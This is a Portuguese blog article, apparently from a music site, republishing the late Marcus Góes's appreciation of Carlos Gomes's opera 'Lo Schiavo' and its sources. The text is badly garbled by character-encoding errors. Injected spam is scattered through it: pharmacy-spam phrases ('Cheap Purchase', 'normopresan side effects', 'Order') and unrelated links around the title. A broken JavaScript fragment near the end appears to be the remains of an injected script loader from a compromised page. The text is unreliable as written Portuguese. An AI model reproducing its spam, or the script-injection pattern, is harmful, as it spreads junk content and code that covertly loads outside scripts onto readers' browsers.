Escrito por em 23 out 2016 nas áreas Artigo, Ópera

A vida e a obra de Carlos Gomes (1836-1896) foi um de seus maiores objetos de estudo.

Marcus GA?es (1939-2016), ao partir, deixou um precioso acervo de artigos, livros em andamento, fontes de pesquisa e muitoA�material coletado durante sua vida. Tal acervo versa principalmente sobre mA?sica, sendo a vida e a obra do compositor Carlos Gomes (1836-1896) um de seus objetos de estudo preferidos. Estudioso e meticuloso como era, Marcus contribuiu para a elucidaA�A?o de muitas afirmativas duvidosas sobre este compositor, baseando-se em documentos sobre a sua vida pessoal e artA�stica, resultantes de suas pesquisas sobre fontes histA?ricas no Brasil e, principalmente, na ItA?lia.

Nesta semana em que o Theatro Municipal do Rio de JaneiroA�apresenta a belA�ssima obra de Carlos Gomes, cabe publicar um antigo artigo deste que foi, reconhecidamente, o maior biA?grafo do nosso compositor.
Cheap Purchase

* A�* A�*

 

http://bendevarimprojesi.com/?p=11057 Lo Schiavo – O Escravo http://ty9952.blogcn.com/?p=1055

A�pera mais bonita de todas as compostas por Carlos Gomes, baseia-se primordialmente em uma peA�a de teatro de Alexandre Dumas Filho pouquA�ssimo conhecida e comentada chamada Les Danicheff, editada em 1876 em parceria com o escritor russo Korvin Krukowsky. Secundariamente, baseia-se em fatos reais da vida de Alfredo da��Escragnolle Taunay, amicA�ssimo de Carlos Gomes, e no poema A�pico A ConfederaA�A?o dos Tamoios, de Domingos JosA� GonA�alves de MagalhA?es.

Composta toda ela dentro de um perA�odo em que mais se aguA�avam as nostalgias de Carlos Gomes por sua terra distante, em meio a tantos problemas de ordem material e moral, a partitura de normopresan side effects O escravo A� a mais uniforme e homogA?nea de todas as do compositor. A uniformidade do momento na vida real do autor se reflete na obra: quanto mais infeliz e perseguido da sorte se sentia, mais se lembrava do esplendido cA�u azul de seu paA�s, dos regatos, das florestas, dos sonhos de amor, e a inspiraA�A?o lhe vinha fA?cil, direta, sempre seguindo o mesmo fio condutor. O escravo Purchase A� um dos maiores e mais belos cantos de amor jamais escrito por um artista A� sua terra natal.

Assinala na produA�A?o de Carlos Gomes o inA�cio de um novo apogeu, nA?o sA? como compositor dotado de talento e inspiraA�A?o, mas de artista moderno, atualizado, a pensar para a frente e a encarar sua arte como um corpo dinA?mico em eterna evoluA�A?o. Poderia atribuir-se a ele, com todos os mA�ritos, a frase a�?procuremos o futuro, lA? estA? o progressoa�?. Carlos Gomes em O escravo, mesmo nA?o perdendo de vista a melodia, A� atual e moderno,A�e aberto a experiA?ncias.

Aos que a ouvirem em rA�citas ao vivo ou em gravaA�A�es, serA? fA?cil, mesmo a leigos, perceber o que vai aqui afirmado. Como em muitas ocasiA�es na histA?ria da arte em que o artista, mesmo humilhado e ofendido, produz o melhor e mais comovente de sua arte, Carlos Gomes ao terminar O escravo havia composto sua A?pera mais sentimental, sua partitura mais homogA?nea, mais poA�tica, mais nostA?lgica, e mais cheia de amor por sua terra e por sua gente. O escravo A� uma dessas raras obras musicais em que se combinam a maravilha, o coraA�A?o e a cabeA�a de seu autor, sentimento e raciocA�nio e, como se tudo isso nA?o bastasse, A� uma obra de suprema riqueza melA?dica.

* A�* A�*

Order
 

NOTA DO EDITOR:A�a soprano Leila GuimarA?es, viA?va de Marcus GA?es, comunica que o acervo do pesquisador sobre Carlos Gomes estA? A� disposiA�A?o dos interessadas no assunto. Quem se interessar, pode entrar em contato com antonio@movimento.com, por meio do qual serA? feito o contato entre ela e os interessados. Purchase

 if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);

Faça seu comentário